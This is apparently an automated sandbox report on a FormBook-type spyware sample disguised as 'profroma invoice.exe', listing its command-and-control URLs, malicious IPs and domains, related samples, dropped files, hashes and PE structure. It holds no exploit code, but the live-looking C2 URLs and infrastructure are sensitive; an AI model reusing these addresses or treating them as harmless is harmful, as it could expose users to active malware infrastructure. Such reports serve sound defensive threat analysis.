                              http://www.1qcczjvh2.autos/pfw9/?OVldGJw=45l5W170mEENNSUkva5u0oLDjn7a85Be/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZDC0jYAJATZz8bqUDD2VUfBcYMm5ScOmty60G6hY6HDPa2g==&OP=QXZPwDNH0BG0ttd0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.techmiseajour.net/jytl/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aktmarket.xyz/wb7v/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.iglpg.online/rbqc/?OVldGJw=3OhzIPQDpE/WyOq7Ap5YzcvodMsyqKhwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rlu95wMgHAHM1mSs1zJwZJ5t13zgPyFY5h6K1xMGitp/XiNQ==&OP=QXZPwDNH0BG0ttd0true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabcacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listcacls.exe, 00000007.00000002.3926041344.000000000401A000.00000004.10000000.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3925480533.00000000031BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icocacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://codepen.io/uzcho_/pen/eYdmdXw.csscacls.exe, 00000007.00000002.3926041344.000000000401A000.00000004.10000000.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3925480533.00000000031BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/kviskotekaDbDataSet.xsdcIgraprofroma invoice.exefalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.aapanel.com/new/download.html?invite_code=aapanelecacls.exe, 00000007.00000002.3926041344.000000000433E000.00000004.10000000.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3925480533.00000000034DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.1qcczjvh2.autosvEErKBMCpBGs.exe, 00000008.00000002.3924593962.0000000000A55000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        13.248.169.48
                                                        		www.aktmarket.xyzUnited States
                                                        		16509AMAZON-02UStrue
                                                        84.32.84.32
                                                        		techmiseajour.netLithuania
                                                        		33922NTT-LT-ASLTtrue
                                                        3.33.130.190
                                                        		iglpg.onlineUnited States
                                                        		8987AMAZONEXPANSIONGBtrue
                                                        66.29.149.46
                                                        		www.golivenow.liveUnited States
                                                        		19538ADVANTAGECOMUStrue
                                                        129.226.153.85
                                                        		1hong.pels5zqo.shopSingapore
                                                        		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                        74.208.236.156
                                                        		www.christinascuties.netUnited States
                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1575109
                                                        Start date and time:2024-12-14 13:55:24 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 50s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:profroma invoice.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@6/6
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 93%
                                                        • Number of executed functions: 111
                                                        • Number of non-executed functions: 302
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 20.12.23.50
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target vEErKBMCpBGs.exe, PID 3668 because it is empty
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        13.248.169.48SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.xphone.net/i7vz/
                                                        RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                        • www.krshop.shop/5p01/
                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                        • sharewood.xyz/administrator/index.php
                                                        MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                        • www.snyp.shop/4nyz/
                                                        Recibos.exeGet hashmaliciousFormBookBrowse
                                                        • www.egyshare.xyz/lp5b/
                                                        AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                        • www.avalanchefi.xyz/ctta/
                                                        AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                        • www.avalanchefi.xyz/ctta/
                                                        Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                        • www.hsa.world/09b7/
                                                        MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                        • www.lovel.shop/rxts/
                                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                        • www.snyp.shop/4nyz/
                                                        84.32.84.32ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                        • www.appsolucao.shop/qt4m/
                                                        Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                        • www.thesnusgang.fun/z4qr/
                                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • www.activateya.life/f95q/
                                                        ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                        • www.thesnusgang.fun/z4qr/
                                                        DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                        • www.samundri.online/3ifu/
                                                        purchase order.exeGet hashmaliciousFormBookBrowse
                                                        • www.techmiseajour.net/jytl/
                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                        • www.appsolucao.shop/qize/
                                                        Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                        • www.sido247.pro/073p/
                                                        SW_5724.exeGet hashmaliciousFormBookBrowse
                                                        • www.samundri.online/3ifu/
                                                        attached invoice.exeGet hashmaliciousFormBookBrowse
                                                        • www.techmiseajour.net/jytl/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.aktmarket.xyzpurchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        attached invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 13.248.169.48
                                                        Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        VSP469620.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        1hong.pels5zqo.shoppurchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 129.226.153.85
                                                        attached invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 129.226.153.85
                                                        PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                        • 129.226.153.85
                                                        attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 43.163.1.110
                                                        DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                        • 43.163.1.110
                                                        www.christinascuties.netpurchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 74.208.236.156
                                                        attached invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 74.208.236.156
                                                        attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 74.208.236.156
                                                        file.exeGet hashmaliciousFormBookBrowse
                                                        • 74.208.236.156

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        NTT-LT-ASLTORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                        • 84.32.84.239
                                                        DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        purchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                                        • 84.32.84.93
                                                        iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                        • 84.32.84.100
                                                        iGxCM2I5u9.exeGet hashmaliciousUnknownBrowse
                                                        • 84.32.84.122
                                                        ADVANTAGECOMUSQuotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.149.46
                                                        https://shinybnb.ch/wp-includes/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 66.29.132.149
                                                        RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.149.46
                                                        prtprr.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.133.226
                                                        DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.149.46
                                                        DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.149.46
                                                        QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.149.46
                                                        purchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.149.46
                                                        965600.invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.153.238
                                                        rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 66.29.137.10
                                                        AMAZONEXPANSIONGBhttps://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3DGet hashmaliciousUnknownBrowse
                                                        • 3.33.220.150
                                                        https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentGet hashmaliciousHTMLPhisherBrowse
                                                        • 52.223.40.198
                                                        SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                        • 52.223.40.198
                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                        • 3.33.130.190
                                                        PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                        • 52.223.13.41
                                                        ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        ShareGate.24.12.1.msiGet hashmaliciousUnknownBrowse
                                                        • 3.33.243.49
                                                        phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                        • 3.33.241.96
                                                        http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 3.33.155.121
                                                        AMAZON-02USORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                        • 13.228.81.39
                                                        rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 34.243.160.129
                                                        https://publuu.com/flip-book/749011/1660718Get hashmaliciousHTMLPhisherBrowse
                                                        • 13.59.79.78
                                                        https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3DGet hashmaliciousUnknownBrowse
                                                        • 13.227.2.22
                                                        http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdhGet hashmaliciousUnknownBrowse
                                                        • 44.227.215.28
                                                        https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentGet hashmaliciousHTMLPhisherBrowse
                                                        • 34.217.153.224
                                                        18037.docGet hashmaliciousUnknownBrowse
                                                        • 15.222.187.200
                                                        Codale Electric Supply Health Insurance Benefits Open Enrollment Plan.html.shtmlGet hashmaliciousUnknownBrowse
                                                        • 34.253.40.242
                                                        https://us-west-2.protection.sophos.com/?d=microsoft.com&u=aHR0cHM6Ly9jdXN0b21lcnZvaWNlLm1pY3Jvc29mdC5jb20vUGFnZXMvUmVzcG9uc2VQYWdlLmFzcHg_aWQ9R1V1LXNGcV9vVWVfanViX1RzNWNzTjJ3cmI2cGNXbEJ2Vm9kQTg3OVBVbFVNRGMyUXpNd00wdENVVFJWT1ZGUFRWYzNPRWM1V0ZsRE1DNHU=&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=YzVvY0ZoOHFRSGdCNnRncDc0ajJVNDZ2OTFMQXU1d0o3eU5tbk9LTnRwdz0=&h=fb80ac6ee6b9415ab2e67948974a6ac6&s=AVNPUEhUT0NFTkNSWVBUSVYEA8vQ82X9oDKen41DcCmWhkUnMNiRIUMWwszf4nzAf5AOW4BqwHD-tdThtGIGLosGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                        • 13.227.8.101
                                                        https://www.canva.com/design/DAGZLdpMEGI/O58JBUDFuRvFcdZ0tgIwgA/edit?utm_content=DAGZLdpMEGI&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisherBrowse
                                                        • 54.246.144.89

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\profroma invoice.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\profroma invoice.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Temp\t577G2K6

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cacls.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.121297215059106
                                                        Encrypted:false
                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.717111036540073
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:profroma invoice.exe
                                                        File size:837'632 bytes
                                                        MD5:17ea16c0677c90f27faddb659598f8f2
                                                        SHA1:4e57ad74ce9f950711417d49506d30fa105f8cf5
                                                        SHA256:97254f2e1720380e24069d4f7a8f274c8a2437e3c445c3ee228c54845a39b064
                                                        SHA512:92fb7858e3d9da00a1615ce7561f0cd76566144ae3ae06f9176c987f524c6669831b7f10013afe7bef19675f9526f3d67e3dfdb65e02f5c68d600c1c4d7d2ec0
                                                        SSDEEP:12288:5C25usx+XtFZHqIJHM/cuc4PkpLfl9202/7sctefvTKYUG3ahtciv2YXeig+H:rxoZHLCcucHlfP8zubKXhtXe
                                                        TLSH:F705F1193669880BDAB297F01A72F1B517FC6EADA901E2C64EC56DDFB8F5F800940713
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...="Mg..............0...... ........... ........@.. ....................... ............@................................

                                                        File Icon

                                                        Icon Hash:5ba4a66a2a263095

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4cc4f2
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x674D223D [Mon Dec 2 02:58:05 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xcc4a00x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x1c3c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xca4f80xca600df2e74e8a88f9dc1d2c0c0bdde151c57False0.8860274957535516data7.72479752308074IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xce0000x1c3c0x1e0005b770cfe44bb578435fa48070f27511False0.8052083333333333data7.065733308701846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xd00000xc0x2002442fa91bb52ae61f54232a9933f44f0False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xce1000x164fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.951672211521625
                                                        RT_GROUP_ICON0xcf7600x14data1.05
                                                        RT_VERSION0xcf7840x2b8COM executable for DOS0.4482758620689655
